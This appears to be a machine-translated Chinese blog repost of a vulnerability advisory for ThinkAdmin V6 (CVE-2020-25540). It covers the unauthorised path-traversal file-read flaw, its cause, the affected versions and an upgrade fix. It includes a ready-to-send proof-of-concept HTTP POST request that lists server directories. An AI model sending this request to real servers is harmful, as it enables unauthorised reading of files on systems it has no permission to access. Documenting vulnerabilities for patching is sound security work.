当前位置:网站首页>Thinkadmin V6 arbitrary file read vulnerability (cve-2020-25540)
Thinkadmin V6 arbitrary file read vulnerability (cve-2020-25540)
2022-07-03 00:15:00 【Lomi only bear】
0x00: Vulnerability profile :
ThinkAdmin It's a set of bases ThinkPHP Framework of the general background management system ,ThinkAdmin Rights management of is based on Standards RBAC Simplify , It eliminates the complicated node management , Make permission management simpler , Specifically, it includes node management 、 Rights management 、 Menu management 、 User management .
ThinkAdmin 6 There is a path traversal vulnerability in version . An attacker can exploit this vulnerability through GET Request encoding parameters to arbitrarily read files on the remote server .
0x01 Causes of loopholes :
https://github.com/zoujingli/ThinkAdmin/blob/v6/app/admin/controller/api/Update.php
Update.php Function method in is not authorized , Direct functions can be called directly . It leads to loopholes .
0x02 scope :
Thinkadmin Version less than ≤ 2020.08.03.01
0x03 Loophole recurrence :
POC: POST /admin.html?s=admin/api.Update/node HTTP/1.1 Host: 127.0.0.1 Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 22 rules=%5B%22.%2F%22%5D
0x04 Repair suggestions :
Upgrade to the latest version
边栏推荐
- 95 pages of smart education solutions 2022
- Open source | Wenxin big model Ernie tiny lightweight technology, which is accurate and fast, and the effect is fully open
- How do educators find foreign language references?
- 有哪些比较推荐的论文翻译软件?
- MySQL Foundation
- Returns the size of the largest binary search subtree in a binary tree
- [shutter] open the third-party shutter project
- What is the official website address of e-mail? Explanation of the login entry of the official website address of enterprise e-mail
- CADD课程学习(4)-- 获取没有晶体结构的蛋白(SWISS-Model)
- Bigder:32/100 测试发现的bug开发认为不是bug怎么处理
猜你喜欢

67 page overall planning and construction plan for a new smart city (download attached)

What website can you find English literature on?

開源了 | 文心大模型ERNIE-Tiny輕量化技術,又准又快,效果全開

Explain in detail the process of realizing Chinese text classification by CNN

Angled detection frame | calibrated depth feature for target detection (with implementation source code)

The privatization deployment of SaaS services is the most efficient | cloud efficiency engineer points north

CADD course learning (4) -- obtaining proteins without crystal structure (Swiss model)

The privatization deployment of SaaS services is the most efficient | cloud efficiency engineer points north

Program analysis and Optimization - 9 appendix XLA buffer assignment

How much do you know about synchronized?
随机推荐
Interpretation of new plug-ins | how to enhance authentication capability with forward auth
秒杀系统设计
Slf4j + Logback日志框架
[shutter] open the third-party shutter project
sourcetree 详细
sysdig分析容器系统调用
Codeforces Round #771 (Div. 2)---A-D
AcWing_188. 武士风度的牛_bfs
What website can you find English literature on?
Returns the root node of the largest binary search subtree in a binary tree
JS interviewer wants to know how much you understand call, apply, bind no regrets series
Should you study kubernetes?
PR FAQ, what about PR preview video card?
Pytorch里面多任务Loss是加起来还是分别backward?
教育学大佬是怎么找外文参考文献的?
yolov5detect. Py comment
yolov5train. py
Maybe you read a fake Tianlong eight
返回二叉树中最大的二叉搜索子树的根节点
Which software can translate an English paper in its entirety?